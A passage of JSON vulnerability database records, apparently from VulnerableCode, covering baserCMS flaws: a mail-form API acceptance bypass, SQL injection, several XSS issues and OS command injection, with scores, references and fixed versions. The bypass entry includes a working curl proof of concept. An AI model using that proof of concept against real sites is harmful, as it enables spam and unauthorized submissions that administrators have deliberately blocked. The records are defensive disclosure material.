`plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05615", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.056", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878" }, { "reference_url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c", "reference_id": "GHSA-8cr7-r8qw-gp3c", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30878", "GHSA-8cr7-r8qw-gp3c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=api", "vulnerability_id": "VCID-k5qv-4yp3-zbgf", "summary": "baserCMS has an SQL injection vulnerability in its blog post functionality\nbaserCMS has a SQL injection vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nMalicious SQL may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_52157568\n\n### Credits\n\nMirai Matsumoto@Future Secure Wave, Inc.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02103", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02096", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27697" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27697" }, { "reference_url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p", "reference_id": "GHSA-vh89-rjph-2g7p", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-vh89-rjph-2g7p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-27697", "GHSA-vh89-rjph-2g7p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56066?format=api", "vulnerability_id": "VCID-khft-xvrw-g3dr", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request\nXSS vulnerability in HTTP 400 Bad Request to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75586", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75582", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46995" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://basercms.net/security/JVN_06274755", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/" } ], "url": "https://basercms.net/security/JVN_06274755" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995", "reference_id": "CVE-2024-46995", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995" }, { "reference_url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv", "reference_id": "GHSA-mr7q-fv7j-jcgv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv", "reference_id": "GHSA-mr7q-fv7j-jcgv", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46995", "GHSA-mr7q-fv7j-jcgv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=api", "vulnerability_id": "VCID-mfm9-gsh3-ubg8", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in Blog posts feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01236", "scoring_system": "epss", "scoring_elements": "0.79576", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01236", "scoring_system": "epss", "scoring_elements": "0.79581", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996", "reference_id": "CVE-2024-46996", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996" }, { "reference_url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg", "reference_id": "GHSA-66jv-qrm3-vvfg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg", "reference_id": "GHSA-66jv-qrm3-vvfg", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46996", "GHSA-66jv-qrm3-vvfg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=api", "vulnerability_id": "VCID-p695-t9ye-v3ga", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in Edit Email Form Settings Feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01064", "scoring_system": "epss", "scoring_elements": "0.78057", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01064", "scoring_system": "epss", "scoring_elements": "0.7805", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://basercms.net/security/JVN_98693329", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/" } ], "url": "https://basercms.net/security/JVN_98693329" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998", "reference_id": "CVE-2024-46998", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998" }, { "reference_url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x", "reference_id": "GHSA-p3m2-mj3j-j49x", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x", "reference_id": "GHSA-p3m2-mj3j-j49x", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46998", "GHSA-p3m2-mj3j-j49x" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=api", "vulnerability_id": "VCID-sqr4-v889-tff8", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in Blog posts and Contents list Feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01179", "scoring_system": "epss", "scoring_elements": "0.79118", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01179", "scoring_system": "epss", "scoring_elements": "0.79112", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994", "reference_id": "CVE-2024-46994", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994" }, { "reference_url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr", "reference_id": "GHSA-wrjc-fmfq-w3jr", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr", "reference_id": "GHSA-wrjc-fmfq-w3jr", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46994", "GHSA-wrjc-fmfq-w3jr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=api", "vulnerability_id": "VCID-y2sz-c6vb-pkdp", "summary": "baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running 